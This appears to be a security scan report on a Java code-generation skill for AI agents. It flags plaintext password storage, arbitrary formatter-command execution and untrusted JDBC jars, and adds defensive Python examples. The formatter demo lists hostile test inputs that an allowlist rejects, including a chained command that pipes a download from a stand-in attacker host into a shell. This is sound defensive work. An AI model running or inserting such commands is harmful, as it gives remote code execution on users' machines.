Easycode Skill

Pass. Audited by VirusTotal on May 11, 2026.

Overview

Type: OpenClaw Skill
Name: easycode-skill
Version: 1.0.3

The skill bundle provides Java code generation from databases but exhibits high-risk behaviors. Specifically, 'scripts/easycode_skill.py' stores database credentials (including passwords) in plaintext within a local '.easycode-skill/state.json' file, and the 'project_format_command' field allows arbitrary command execution through the '_run_project_formatter' function. While both features support the stated purpose of code generation and formatting, the lack of credential protection and the direct execution of user-supplied command strings are significant security weaknesses. No evidence of intentional data exfiltration or malicious backdoors was found.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

What this means

The agent can connect to the specified database and read schema, table, column, and comment metadata.

Why it was flagged

The skill uses a database password to connect and read table metadata. This is expected for code generation, but it is still sensitive account access.

Skill content
String pass = req(a, "pass"); ... DriverManager.getConnection(url, user, pass)
Recommendation

Use a least-privilege, read-only database account and avoid production credentials unless necessary.

Concern: Medium Confidence
ASI06: Memory and Context Poisoning
What this means

A database password or connection details could remain on disk and be exposed to anyone or anything that can read the project directory.

Why it was flagged

The visible code writes state to a local JSON file. SKILL.md also says interactive mode persists `pass`, so database passwords may be retained locally unless other omitted code encrypts or removes them.

Skill content
STATE_DIR = Path(".easycode-skill") ... STATE_FILE = STATE_DIR / "state.json" ... json.dump(state, f, ensure_ascii=False, indent=2)
Recommendation

Before using interactive mode, verify whether passwords are scrubbed or stored in a real secret manager; otherwise avoid saving passwords and delete `.easycode-skill/state.json` if sensitive data is present.
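One way to make the check above concrete, as an added example that is not part of the skill or of this scan: a small audit that walks a state.json file for secret-bearing fields, and a scrubbing step that replaces the password with an environment-variable placeholder before the file is written. It assumes the file is a JSON object holding the connection fields, including the "pass" key quoted in the scan; the other key names, the environment-variable name and the function names are assumptions for illustration.

```python
"""Audit a persisted state file for plaintext secrets and scrub them before writing.

Added example, not code from easycode-skill. It assumes the state file is a JSON
object in which interactive mode stores the connection fields, including "pass"
(the key name quoted in the scan); the other key names, the env-var name and the
function names are assumptions for illustration.
"""
import json
import os
import tempfile
from pathlib import Path

# "pass" is the field the scan quotes; the rest are common variants (assumption).
SECRET_KEYS = {"pass", "password", "passwd", "secret", "token"}
DEFAULT_ENV_VAR = "EASYCODE_DB_PASSWORD"   # hypothetical name


def _is_reference(value):
    """True for a "${VAR}" placeholder, which is safe to leave on disk."""
    return isinstance(value, str) and value.startswith("${") and value.endswith("}")


def find_plaintext_secrets(state, prefix=""):
    """Return dotted paths of every secret-looking key holding a real, non-empty value.

    Walks nested dicts and lists, so a password at state["db"]["pass"] is
    reported as "db.pass". Placeholder references are not reported.
    """
    hits = []
    if isinstance(state, dict):
        for key, value in state.items():
            path = f"{prefix}.{key}" if prefix else str(key)
            if str(key).lower() in SECRET_KEYS:
                if value not in (None, "") and not _is_reference(value):
                    hits.append(path)
            else:
                hits.extend(find_plaintext_secrets(value, path))
    elif isinstance(state, list):
        for i, item in enumerate(state):
            hits.extend(find_plaintext_secrets(item, f"{prefix}[{i}]"))
    return hits


def scrub_secrets(state, env_var=DEFAULT_ENV_VAR):
    """Return a copy of state with secret values replaced by a "${ENV_VAR}" reference.

    The real password is then supplied at connect time from the environment or a
    secret manager, so the file written to .easycode-skill/state.json carries none.
    """
    if isinstance(state, dict):
        out = {}
        for key, value in state.items():
            if str(key).lower() in SECRET_KEYS and value not in (None, "") and not _is_reference(value):
                out[key] = "${" + env_var + "}"
            else:
                out[key] = scrub_secrets(value, env_var)
        return out
    if isinstance(state, list):
        return [scrub_secrets(item, env_var) for item in state]
    return state


def resolve_password(state, env=None):
    """Turn a scrubbed "${VAR}" reference back into the live password at connect time."""
    env = os.environ if env is None else env
    value = state.get("pass")
    if _is_reference(value):
        return env.get(value[2:-1])
    return value or None


def audit_state_file(path):
    """Load a state.json file and list its secret-bearing fields (empty list if clean)."""
    with open(path, encoding="utf-8") as f:
        return find_plaintext_secrets(json.load(f))


if __name__ == "__main__":
    # Constructed sample of what interactive mode could persist; not real data.
    sample = {"url": "jdbc:mysql://db.internal:3306/app", "user": "codegen",
              "pass": "hunter2", "project_root": "/work/app"}
    with tempfile.TemporaryDirectory() as d:
        state_file = Path(d) / ".easycode-skill" / "state.json"
        state_file.parent.mkdir()
        state_file.write_text(json.dumps(sample, ensure_ascii=False, indent=2), encoding="utf-8")
        print("plaintext secrets before scrub:", audit_state_file(state_file))
        state_file.write_text(json.dumps(scrub_secrets(sample), indent=2), encoding="utf-8")
        print("plaintext secrets after scrub: ", audit_state_file(state_file))
```

Running the audit against an existing .easycode-skill/state.json tells you whether the recommendation above applies; the scrub step is the shape of the fix if you maintain a local patch of the skill, with the password coming from the environment at connect time instead of from the file.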

What this means

A formatter command can modify the project or run arbitrary local build actions under the user's account.

Why it was flagged

The skill can run user-specified local commands after generating files. That is useful for formatting, but it is a broad execution capability if populated with unsafe commands.

Skill content
"project_format_command": { ... "description": "Optional formatter command(s) executed in project_root after generation, e.g. './gradlew spotlessApply'" }
Recommendation

Only enable formatter execution for commands you recognize, and review the generation plan before allowing file writes or formatting.
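The following is an added example, not code from easycode-skill, of what "only enable formatter execution for commands you recognize" looks like when enforced in code rather than by habit. The skill's own _run_project_formatter is not shown in the scan, so this is a hardened version of the pattern the metadata describes: a command string run in project_root after generation. The allowlist, the helper names and the throwaway demo project are assumptions.

```python
"""Gate a configured formatter command behind an allowlist before running it.

Added example, not code from easycode-skill: the skill's own _run_project_formatter
is not shown in the scan, so this is a hardened version of the pattern the metadata
describes (a command string run in project_root after generation). The allowlist,
the helper names and the demo project layout are assumptions.
"""
import shlex
import subprocess
import tempfile
from pathlib import Path

# Invocations a reviewer has recognised, stored as argv lists rather than shell
# strings so nothing but these exact tokens can ever reach exec().
ALLOWED_FORMATTERS = [
    ["./gradlew", "spotlessApply"],     # the example quoted in the skill metadata
    ["./mvnw", "spotless:apply"],
]
SHELL_METACHARS = set(";&|<>`$(){}\n\r")


def parse_formatter_command(cmd):
    """Split the configured string into argv without a shell.

    Rejects shell metacharacters outright: with them present the string could
    chain or substitute other programs, and an allowlist of the leading tokens
    would be meaningless.
    """
    bad = sorted(c for c in SHELL_METACHARS if c in cmd)
    if bad:
        raise ValueError(f"shell metacharacters {bad} in formatter command {cmd!r}")
    argv = shlex.split(cmd)
    if not argv:
        raise ValueError("empty formatter command")
    return argv


def is_allowed(argv):
    """Exact-match check: extra tokens such as another Gradle task are refused."""
    return argv in ALLOWED_FORMATTERS


def run_project_formatter(cmd, project_root, dry_run=False):
    """Validate cmd and run it in project_root with an explicit argv (no shell=True).

    Returns the argv that was (or, with dry_run, would have been) executed.
    A './wrapper' must resolve to a regular file inside project_root, so a
    project_root pointing elsewhere cannot pull in a foreign wrapper script.
    """
    argv = parse_formatter_command(cmd)
    if not is_allowed(argv):
        raise PermissionError(f"formatter not allowlisted: {argv}")
    root = Path(project_root).resolve()
    if argv[0].startswith("./"):
        wrapper = (root / argv[0]).resolve()
        if root not in wrapper.parents or not wrapper.is_file():
            raise PermissionError(f"wrapper script missing under project root: {wrapper}")
    if not dry_run:
        subprocess.run(argv, cwd=root, check=True, shell=False)
    return argv


def make_demo_project():
    """Create a throwaway project dir with a stub ./gradlew (constructed demo data)."""
    root = Path(tempfile.mkdtemp())
    (root / "gradlew").write_text("#!/bin/sh\necho 'stub gradlew' \"$@\"\n")
    return str(root)


if __name__ == "__main__":
    root = make_demo_project()
    for cmd in ["./gradlew spotlessApply",
                "./gradlew spotlessApply publish",
                "./gradlew spotlessApply; curl http://attacker.invalid | sh",
                "python3 -c 'import os; os.system(\"id\")'"]:
        try:
            print("allow:", run_project_formatter(cmd, root, dry_run=True))
        except (ValueError, PermissionError) as e:
            print("deny: ", e)
```

The two properties that matter are that the command never passes through a shell (argv list, shell=False) and that the allowlist is an exact match on the whole argv, so "./gradlew spotlessApply publish" is refused even though its prefix is recognised. A skill that instead hands the raw string to a shell gives the author of the config file, or anything that can write to it, command execution as the user.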

What this means

A compromised or untrusted JDBC driver jar could run code when the Java bridge loads it.

Why it was flagged

The skill locates JDBC driver jars in its own 'drivers' directory and in the local Maven repository. Loading local jars is expected for JDBC metadata, but code in a jar runs with the user's privileges as soon as the Java bridge loads it, so the user must be able to trust those jars (for example by checking them against the vendor's published checksums).

Skill content
"patterns": ["{skill_root}/drivers/mysql/*.jar", "{home}/.m2/repository/com/mysql/mysql-connector-j/*/mysql-connector-j-*.jar", ...]
Recommendation

Use official JDBC drivers from trusted repositories and avoid passing unknown `driver_jar` paths.
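As an added example (not code from easycode-skill or its Java bridge), the check a practitioner would want to run before passing a jar to the bridge: confirm the file is a real jar that declares a java.sql.Driver service, and that its SHA-256 matches a digest pinned from the vendor's published checksums. The pinned-digest set, the function names and the jars built here are constructed for the demonstration; real digests must come from the vendor, never from the jar already on disk.

```python
"""Verify a JDBC driver jar before handing it to the Java bridge.

Added example, not code from easycode-skill. It checks two things before a local
jar is loaded: that the file is a real jar declaring a java.sql.Driver service,
and that its SHA-256 is in a set of pinned, vendor-published digests. The pinned
set, the function names and the demo jars are assumptions / constructed data.
"""
import hashlib
import tempfile
import zipfile
from pathlib import Path

SERVICE_ENTRY = "META-INF/services/java.sql.Driver"


def sha256_file(path, chunk=1 << 20):
    """Streaming SHA-256 of a file, as a hex string."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def driver_classes(path):
    """Driver class names declared in the jar's java.sql.Driver service file.

    Returns an empty list if the file is not a zip/jar or declares no driver.
    """
    try:
        with zipfile.ZipFile(path) as zf:
            if SERVICE_ENTRY not in zf.namelist():
                return []
            text = zf.read(SERVICE_ENTRY).decode("utf-8", "replace")
    except zipfile.BadZipFile:
        return []
    lines = (ln.strip() for ln in text.splitlines())
    return [ln for ln in lines if ln and not ln.startswith("#")]


def verify_driver_jar(path, pinned_sha256):
    """Return (ok, reason); ok only if the digest is pinned and the jar is a JDBC driver."""
    path = Path(path)
    if not path.is_file():
        return False, "not a file"
    digest = sha256_file(path)
    if digest not in pinned_sha256:
        return False, f"sha256 {digest[:16]}... not pinned"
    if not driver_classes(path):
        return False, "no java.sql.Driver service entry"
    return True, "ok"


def build_fake_jar(path, driver_class="com.mysql.cj.jdbc.Driver", extra=None):
    """Construct a minimal jar for the demo (constructed data, not a real driver)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(SERVICE_ENTRY, driver_class + "\n")
        if extra:
            zf.writestr("evil/Payload.class", extra)   # simulates a tampered jar
    return sha256_file(path)


def demo():
    """Pin a good jar, then verify it, a tampered copy and a non-jar. Returns a dict."""
    d = Path(tempfile.mkdtemp())
    good = d / "mysql-connector-j-demo.jar"        # illustrative name
    pinned = {build_fake_jar(good)}                 # in practice: vendor-published digest
    tampered = d / "mysql-connector-j-demo-tampered.jar"
    build_fake_jar(tampered, extra=b"\xca\xfe\xba\xbe")
    plain = d / "not-a-jar.jar"
    plain.write_bytes(b"hello")
    return {
        "good": verify_driver_jar(good, pinned),
        "tampered": verify_driver_jar(tampered, pinned),
        "not_a_jar": verify_driver_jar(plain, {sha256_file(plain)}),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:10s} -> {result}")
```

Pinning by digest is what actually defends against a swapped jar; the service-file check only catches files that are not JDBC drivers at all. For jars resolved out of ~/.m2, take the digest from the vendor's release page or the central repository's published checksum, not from the local copy that is itself under suspicion.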